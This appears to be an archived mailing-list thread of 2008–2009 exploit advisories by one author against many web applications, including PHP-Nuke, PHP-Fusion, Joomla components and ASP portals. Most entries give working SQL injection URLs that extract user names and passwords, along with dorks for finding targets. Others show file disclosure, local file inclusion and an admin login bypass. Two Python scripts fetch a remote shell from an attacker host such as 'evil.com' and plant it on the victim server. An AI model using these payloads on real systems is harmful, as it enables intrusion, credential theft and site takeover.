Bugs Online v2.14 Sql Injection

2009-01-30 Thread r3d . w0rm
#
Bugs Online v2.14  Sql Injection
 
#
#   
#
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)
#
#Discovered by : Sina Yazdanmehr (R3d.W0rm) 
#
#Our Site : http://ircrash.com  
#
#My Official WebSite : http://r3dw0rm.ir
#
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr)
#
#
#   
#
#Download : http://sourceforge.net/project/showfiles.php?group_id=42528 
#
#   
#
#Dork : ext:asp Welcome to bugs online  
#
#   
#
#
#  [Bug]
#
#   
#
#http://[site]/help.asp?stype=-999'%20union%20select%200,suser_name,spassword%20from%20tblusers%20where%20'1
#   
#
## TNX GOD 
##


PHP-Nuke 8.0 Downloads Blind Sql Injection

2009-01-23 Thread r3d . w0rm
#
   PHP-Nuke 8.0 Downloads Blind Sql Injection   
 
#
#   
#
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)
#
#Discovered by : Sina Yazdanmehr (R3d.W0rm) 
#
#Our Site : http://ircrash.com  
#
#My Official WebSite : http://r3dw0rm.ir
#
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr)
#
#
#   
#
#Download : http://phpnuke.org  
#
#   
#
#Dork : inurl:modules.php?name=Downloads PHP-Nuke 
#
#   
#
#
#  [Bug]
#
#   
#
#Admin Username : 
http://[site]/[path]/modules.php?name=Downloadsd_op=Addtitle=1description=1email=attac...@devil.neturl=0%2F*%00*/'%20OR%20ascii(substring((select+aid+from+nuke_authors+limit+0,1),1,1))=ascii_code_try%2F*
#Admin Password : 
http://[site]/[path]/modules.php?name=Downloadsd_op=Addtitle=1description=1email=attac...@devil.neturl=0%2F*%00*/'%20OR%20ascii(substring((select+pwd+from+nuke_authors+limit+0,1),1,1))=ascii_code_try%2F*

#Users Username : 
http://[site]/[path]/modules.php?name=Downloadsd_op=Addtitle=1description=1email=attac...@devil.neturl=0%2F*%00*/'%20OR%20ascii(substring((select+username+from+nuke_users+limit+0,1),1,1))=ascii_code_try%2F*
   
#Users Password : 
http://[site]/[path]/modules.php?name=Downloadsd_op=Addtitle=1description=1email=attac...@devil.neturl=0%2F*%00*/'%20OR%20ascii(substring((select+user_password+from+nuke_users+limit+0,1),1,1))=ascii_code_try%2F*

#   
#
#
#  [Note]   
#
#   
#
#1. magic_quotes_gpc = Off  
#
#2. register_globals = On   
#
#3. For using bug you must login via a simple user. 
#
#4. After using bug go to this url :
#
#http://[site]/[path]/modules.php?name=Downloadsd_op=Addemail=attac...@devil.nettitle=zzurl=zzdescription=zz
#5. I use ascii codes and null byte in url for bypass nuke security function
#
#   please don't change ascii code and %00. 
#
#   
#
## TNX GOD 
##


Asp-project Cookie Handling

2009-01-22 Thread r3d . w0rm
#
Asp-project Cookie Handling 
 
#
#   
#
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)
#
#Discovered by : Sina Yazdanmehr (R3d.W0rm) 
#
#Our Site : http://ircrash.com  
#
#My Official WebSite : http://r3dw0rm.ir
#
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr)
#
#
#   
#
#Download : http://www.sourceforge.net/projects/asp-project 
#
#   
#
#Dork : :(  
#
#   
#
#
#  [Bug]
#
#   
#
#javascript:document.cookie = crypt=1; path=/;
#
#   
#
## TNX GOD 
##


PHP-Fusion Mod Members Bewerb Sql Injection

2009-01-07 Thread r3d . w0rm
#
PHP-Fusion Mod Members Bewerb Sql Injection 
 
#
#   
#
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)
#
#Discovered by : Sina Yazdanmehr (R3d.W0rm) 
#
#Our Site : Http://IRCRASH.COM  
#
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) - Hadi 
Kiamarsi
#
#   
#
#Download : 
http://www.phpfusion-mods.net/infusions/downloads/dldb.php?op=viewid=204
#   
#
#Dork : :(  
#
#   
#
#
#  [Bug]
#
#   
#
#http://Site/[path]/members.php?sortby=%'%20union%20select%200,user_password,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20fusion_users/*
#   
#
#You must login then use bug .  
#
#   
#
#
#   Site : Http://IRCRASH.COM   
#
## TNX GOD 
##


PHP-Fusion Mod E-Cart Sql Injection

2009-01-07 Thread r3d . w0rm
#
PHP-Fusion Mod E-Cart Sql Injection 
 
#
#   
#
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)
#
#Discovered by : Sina Yazdanmehr (R3d.W0rm) 
#
#Our Site : Http://IRCRASH.COM  
#
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) - Hadi 
Kiamarsi
#
#   
#
#Download : 
http://www.phpfusion-mods.net/infusions/downloads/dldb.php?op=viewid=281
#   
#
#Dork : inurl:/infusions/e_cart 
#
#   
#
#
#  [Bug]
#
#   
#
#Username : 
http://Site/[path]/infusions/e_cart/items.php?CA=-'%20union%20select%20user_name,1,2%20from%20fusion_users/*
#   
#
#Password : 
http://Site/[path]/infusions/e_cart/items.php?CA=-'%20union%20select%20user_password,1,2%20from%20fusion_users/*
#   
#
#
#   Site : Http://IRCRASH.COM   
#
## TNX GOD 
##


Madrese-Portal Sql Injection

2008-12-29 Thread r3d . w0rm
#
Madrese-Portal Sql Injection
 
#
#   
#
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)
#
#Discovered by : Sina Yazdanmehr (R3d.W0rm) 
#
#Our Site : Http://IRCRASH.COM  
#
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) - Hadi 
Kiamarsi
#
#   
#
#Download : 
http://dl.p30vel.ir/scripts/Madrese-Portal-Asp-Eh3an.p-(www.p30vel.ir).rar
#   
#
#Dork : Design By ASD Tasarim 
#
#   
#
#
#  [Bug]
#
#   
#
#Username : 
http://Site/[path]/haber.asp?haber=-999'%20union%20select%200,1,ad,3,4%20from%20Kullanici%20where%20'1
#   
#
#Password : 
http://Site/[path]/haber.asp?haber=-999'%20union%20select%200,1,sifre,3,4%20from%20Kullanici%20where%20'1
#   
#
#
#   Site : Http://IRCRASH.COM   
#
## TNX GOD 
##


Mavi Emlak Sql Injection

2008-12-29 Thread r3d . w0rm
#
   Mavi Emlak Sql Injection 
 
#
#   
#
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)
#
#Discovered by : Sina Yazdanmehr (R3d.W0rm) 
#
#Our Site : Http://IRCRASH.COM  
#
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) - Hadi 
Kiamarsi
#
#   
#
#Download : 
http://dl.p30vel.ir/scripts/Asp-Amlak-Best-Pro-Eh3an.p-(www.p30vel.ir).rar
#   
#
#Dork : © 2004 Copyright by Mavi Emlak Danismanligi 
#
#   
#
#
#  [Bug]
#
#   
#
#http://Site/[path]/newDetail.asp?haberNo=-%20union%20select%200,username,password,3,4,5%20from%20Danismanlar
#   
#
#Admin panel : http://Site/[path]/yonet 
#
#   
#
#
#   Site : Http://IRCRASH.COM   
#
## TNX GOD 
##


PHP-Fusion Mod TI - Blog System Sql Injection

2008-12-25 Thread r3d . w0rm
#

PHP-Fusion Mod TI - Blog System Sql Injection   
 

#

#   
#

#AUTHOR : Sina Yazdanmehr (R3d.W0rm)
#

#Discovered by : Sina Yazdanmehr (R3d.W0rm) 
#

#Our Site : Http://IRCRASH.COM  
#

#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) - Hadi 
Kiamarsi

#

#   
#

#Download : 
http://www.phpfusion-mods.net/infusions/downloads/dldb.php?op=viewid=157

#   
#

#

#  [Bug]
#

#   
#

#http://Site/[path]/blog.php?page=blog_idid=-'+union+select+0,1,2,user_name,user_password,5+from+fusion_users/*

#   
#

#

#   Site : Http://IRCRASH.COM   
#

## TNX GOD 
##


ASP-CMS v.1.0 Sql Injection/Database Disclosure

2008-12-12 Thread r3d . w0rm
#
  ASP-CMS v.1.0 Sql Injection/Database Disclosure   
 
#
#   
#
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)
#
#Discovered by : Sina Yazdanmehr (R3d.W0rm) 
#
#Our Site : Http://IRCRASH.COM  
#
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi   
#
#
#   
#
#Download : 
http://puzzle.dl.sourceforge.net/sourceforge/asp-cms/asp-cms.18-12-04.zip
#   
#
#DORK : :(  
#
#   
#
#
# [Sql Injection]   
#
#   
#
#Username : 
http://Site/[path]/index.asp?cha=-999%20union%20select%200,1,user_username,3,4,5,6,7,8,9,10%20from%20CMS_USERS
#   
#
#Password : 
http://Site/[path]/index.asp?cha=-999%20union%20select%200,1,user_password,3,4,5,6,7,8,9,10%20from%20CMS_USERS
#   
#
#
#   [Database Disclosure]   
#
#   
#
#http://Site/[path]/mdb-database/ASP-CMS_v100.mdb   
#
#   
#
#
#   Site : Http://IRCRASH.COM   
#
## TNX GOD 
##


Joomla Component GameQ

2008-12-04 Thread r3d . w0rm
#
Joomla Component GameQ  
 
#
#   
#
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)
#
#Discovered by : Sina Yazdanmehr (R3d.W0rm) 
#
#Our Site : Http://IRCRASH.COM  
#
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi   
#
#
#   
#
#Download : http://joomlacode.org/gf/project/gameq  
#
#   
#
#DORK : inurl:option=com_gameq  
#
#   
#
#
#   [Bug]   
#
#   
#
#http://Site/[path]/index.php?option=com_gameqtask=pagecategory_id=-+union+select+0,1,2,3,4,5,username,password,8,9,10,11,12,13+from+jos_users/*
#   
#
#
#   Site : Http://IRCRASH.COM   
#
## TNX GOD 
##


Joomla Component mydyngallery

2008-12-04 Thread r3d . w0rm
#
  Joomla Component mydyngallery 
 
#
#   
#
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)
#
#Discovered by : Sina Yazdanmehr (R3d.W0rm) 
#
#Our Site : Http://IRCRASH.COM  
#
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi   
#
#
#   
#
#Download : http://mydyngallery.mon-cottenchy.fr
#
#   
#
#DORK : inurl:option=com_mydyngallery   
#
#   
#
#
#   [Bug]   
#
#   
#
#http://Site/[joomla_path]/index.php?option=com_mydyngallerydirectory=zzz'+union+select+0,1,2,concat(0x3C703E,username,0x7c,password,0x3C2F703E),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users/*
#   
#
#
#   Site : Http://IRCRASH.COM   
#
## TNX GOD 
##


boastMachine v3.1 Remote Sql Injection

2008-11-20 Thread r3d . w0rm
#
boastMachine v3.1 Remote Sql Injection  
 
#
#   
#
#AUTHOR : R3d.W0rm (Sina Yazdanmehr)
#
#Discovered by : R3d.W0rm (Sina Yazdanmehr) 
#
#Our Site : Http://IRCRASH.COM  
#
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi   
#
#
#   
#
#Download : www.boastology.com  
#
#   
#
#DORK : Powered by boastMachine v3.1
#
#   
#
#
#   [Bug]   
#
#   
#
#http://Site/[path]/mail.php?action=R3d.W0rmblog=1id=-9'+union+select+0,1,concat_ws(0x7c,user_login,user_pass),3+from+bmc_users/*
#   
#
#
#   Site : Http://IRCRASH.COM   
#
## TNX GOD 
##


Arab Portal v2.1 Remote File Disclosure (Win32)

2008-11-06 Thread r3d . w0rm
#

Arab Portal v2.1 Remote File Disclosure (Win32) 
 

#

#   
#

#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))  
#

#Discovered by : R3d.W0rm (Sina Yazdanmehr) 
#

#Our Site : Http://IRCRASH.COM  
#

#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi   
#

#

#   
#

#Download : www.arabportal.net  
#

#   
#

#DORK : Powered by:   Arab Portal  inurl:mod.php?mod=html   
#

#   
#

#

#   [Bug]   
#

#   
#

#http://Site/[path]/mod.php?mod=htmlmodfile=showfile=..\File.Type 
#

#   
#

#Config File :  
#

#http://Site/[path]/mod.php?mod=htmlmodfile=showfile=..\..\..\admin\conf.php  
#

#   
#

#Note : This bug only work on windows servers . 
#

#   
#

#

#   Site : Http://IRCRASH.COM   
#

## TNX GOD 
##


minb Remote Code Execution Exploit

2008-09-11 Thread r3d . w0rm
#!/usr/bin/python

#

 minb Remote Code Execution Exploit 
 

#

#   
#

#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))  
#

#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))   
#

#Our Site : Http://IRCRASH.COM  
#

#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)   
#

#

#   
#

#Site : http://minb.sf.net  
#

#   
#

#Download : 
http://switch.dl.sourceforge.net/sourceforge/minb/minb-0.1.0.tar.bz2#

#   
#

#DORK : Powered by minb 
#

#   
#

#

# [Note]
#

#   
#

#All php file in this cms have this bug ;)  
#

#   
#

#

# Site : Http://IRCRASH.COM 
#

## TNX GOD 
##

import sys,urllib

if len(sys.argv)3 :

print minb Remote code Execution Exploit

print Powered by : R3d.W0rm

print www.IrCrash.com

print Usage :  + sys.argv[0] +  http://Target/path http://evil/shell.txt;

print Ex.  + sys.argv[0] +  http://site.com/minb http://r3d.a20.ir/r.txt;

exit()

if 'http://' not in sys.argv[1] :

sys.argv[1]='http://' + sys.argv[1]

if 'http://' not in sys.argv[2] :

sys.argv[2]='http://' + sys.argv[2]

fp='/include/modules/top/1-random_quote.php?parse=r3d.w0rm'

data=urllib.urlencode({'quotes_to_edit':'quotes_to_edit=;$s=fopen(\'' + 
sys.argv[2] + 
'\',r);while(!feof($s)){$shell.=fread($s,1024);};fclose($s);$fp=fopen(\'../../../upload/pictures/r3d.w0rm.php\',\'w+\');fwrite($fp,$shell);fclose($fp);/*'})

urllib.urlopen(sys.argv[1] + fp,data)

urllib.urlopen(sys.argv[1] + fp)

test=urllib.urlopen(sys.argv[1] + '/upload/pictures/r3d.w0rm.php').read()

if 'Not Found' not in test :

print Shell Uploaded .

print sys.argv[1] + '/upload/pictures/r3d.w0rm.php'

exit()



Stash v1.0.3 Admin bypass / Remote File Disclosure

2008-09-09 Thread r3d . w0rm
#
   Stash v1.0.3 Admin bypass / Remote File Disclosure   
 
#
#   
#
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))  
#
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))   
#
#Our Site : Http://IRCRASH.COM  
#
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)   
#
#
#   
#
#Download : 
http://kent.dl.sourceforge.net/sourceforge/nice-stash/stash-1.0.3.tar.gz#
#   
#
#DORK : :(  
#
#   
#
#
#[Admin by pass]
#
#   
#
#http://Site/[path]/admin/login 
#
#Username : ' or 1=1/*  
#
#Password : R3d.W0rm
#
#   
#
#
#[Remote File Disclosure]   
#
#   
#
#http://Site/[path]/downloadmp3.php?download=-9'+union+select+0,1,2,3,4,concat(0x[file
 name in hex])/* 
#   
#
#Note : You must enter file name in hex in valun address to download it .   
#
#Ex. ../../admin/config.php == 2E2E2F2E2E2F61646D696E2F636F6E6669672E706870 
#
#http://Site/[path]/downloadmp3.php?download=-9'+union+select+0,1,2,3,4,concat(0x2E2E2F2E2E2F61646D696E2F636F6E6669672E706870)/*
 
#   
#
#
#   Site : Http://IRCRASH.COM   
#
## TNX GOD 
##


munky-bliki lfi

2008-08-15 Thread r3d . w0rm
#!user/bin/python

# -*- coding: cp1256 -*-

#

   munky-bliki Lfi  
 

#

#   
#

#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))  
#

#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))   
#

#Our Site : Http://IRCRASH.COM  
#

#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)   
#

#

#   
#

#Script Download : 
http://kent.dl.sourceforge.net/sourceforge/munky/munky-bliki-0.01a.tar.gz

#   
#

#DORK : Copyright © 2004 Dovid Kopel  
#

#   
#

#

#  [Bug]
#

#   
#

#http://Site/?zone=file.type%00 
#

# [Note]
#

#   
#

#By this exploit u can create a shell on valun site ;)  
#

#   
#

#

#   Site : Http://IRCRASH.COM   
#

## TNX GOD 
##

import httplib,urllib

site=raw_input('Site [Ex www.r3d.com]: ')

path=raw_input('Path [Ex /munky]: ')

shell=raw_input('Shell [Ex http://evil.com/shell.txt]: ')

print [*]Powered by : R3d.W0rm - [EMAIL PROTECTED]

conn=httplib.HTTPConnection(site)

print [*]Connected to  + site

print [*]Sending shell code ...

conn.request('GET',path + 
/?zone=?php%20$fp=fopen('r3d.w0rm.php','w%2B');fwrite($fp,'?php%20include%20\\'
 + shell + \\';?');fclose($fp);?)

print [*]Running shell code ...

data=urllib.urlopen('http://' + site + path + '/?zone=../logs/counts.log%00')

print [*]Shell created

print [*] + site + path + '/r3d.w0rm.php'







Ovidentia Sql Injection

2008-08-11 Thread r3d . w0rm

  Ovidentia Sql Injection   
 

#   
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))  

#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))   

#Our Site : Http://IRCRASH.COM  
   
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)   


#   
   
#Script Download : www.ovidentia.org

#   

#DORK : Powered by Ovidentia  

#   


#  [Bug]

#   

#http://Site/index.php?tg=contactidx=modifyitem=-9'+union+select+0,1,2,concat(0x6E69636B6E616D65,0x3A,nickname),concat(0x70617373776F7264,0x3A,password),5,6,7,8,9,10,11,12,13,14+from+bab_users/*
#   

# [Note]

#   

#You must login by a simple user and then use bug ;)

#   

#
#   Site : Http://IRCRASH.COM   
 
## TNX GOD 
##


MyClan Sql Injection

2008-08-06 Thread r3d . w0rm
#
MyClan Sql Injection
 
#
#   

#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))  

#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))   

#Our Site : Http://IRCRASH.COM  
   
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)   

#
#   

#Script Download : www.sourceforge.net/projects/haudenschilt

#   

#DORK : Copyright A© 2005-2006 Battle.net Clan Script 1.5.2 

#   

#
#  [Bug]

#   

#http://Site/index.php?page=membersshowmember='+union+select+name,1,2,password+from+bcs_members/*
#http://Site/index.php?page=boardthread=-+union+select+0,1,password,name,4,5,6,7+from+bcs_members/*
#   

# [Note]

#   

#If you inject and crack admin password you can upload shell in medal pasge in 
admin panel ;)
#   

#
#   Site : Http://IRCRASH.COM   

## TNX GOD 
##


UNAK-CMS Lfi

2008-08-04 Thread r3d . w0rm
#
#  UNAK-CMS Lfi 
#
#   

#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))  

#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))   

#Our Site : Http://IRCRASH.COM  

#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)   

#
#   

#Script Download : www.unak.net 

#   

#DORK : Powered by UNAK-CMS   

#   

#
#  [Lfi]

#   

#http://Site/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Dirroot=/file.type%00
#   

#
#   Site : Http://IRCRASH.COM   

## TNX GOD 
##


eVision 2.0 Sql Injection/Remote File Disclosure/Remote File Upload/IG

2008-08-01 Thread r3d . w0rm
#
   eVision 2.0 Sql Injection/Remote File Disclosure/Remote File Upload/IG   
 
#
#   
#
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))  
#
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))   
#
#Our Site : Http://IRCRASH.COM  
#
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)   
#
#
#   
#
#Script Download : 
http://mesh.dl.sourceforge.net/sourceforge/e-vision/eVision-2.0.tar.gz
#   
#
#DORK : :(  
#
#   
#
#
#[Sql Injection]
#
#   
#
#Blind : http://Site/print.php?id=1'+and+1=1/*  
#
#http://Site/style.php?template=1module='+union+select+concat_ws(0x7c,username,pass)+from+users/*
#User : http://Site/iframe.php?field=usernamemodule=users/*
#
#Pass : http://Site/iframe.php?field=passmodule=users/*
#
# [IG]  
#
#http://Site/admin/phpinfo.php  
#
#   
#
#[Remote File Disclosure]   
#
#   
#
#http://Site/admin/show_img.php?type=text/plainimg=File
#
#Ex. http://Site/admin/show_img.php?type=text/plainimg=../vars.php [Get 
database user  pass]
#   
#
#   [Remote File Upload]
#
#Exploit :  
#
#   
#
#html 
#
#!--   
#
#Powered by : IrCrash (R3d.W0rm(Sina Yazdanmehr))   
# 
#Http://IrCrash.Com 
#
#//--  
#
#form action='http://[Site]/admin/x_image.php?type=background' method=post 
enctype=multipart/form-data
#input type=file name='file_upload'   
#
#input type=hidden name=insert value=1
#
#input type=hidden name=s_rc value='file://'  
#
#input type=submit
#
#/form
#
#/html
#
#   
#
#
#   Site : Http://IRCRASH.COM   
#
## TNX GOD 
##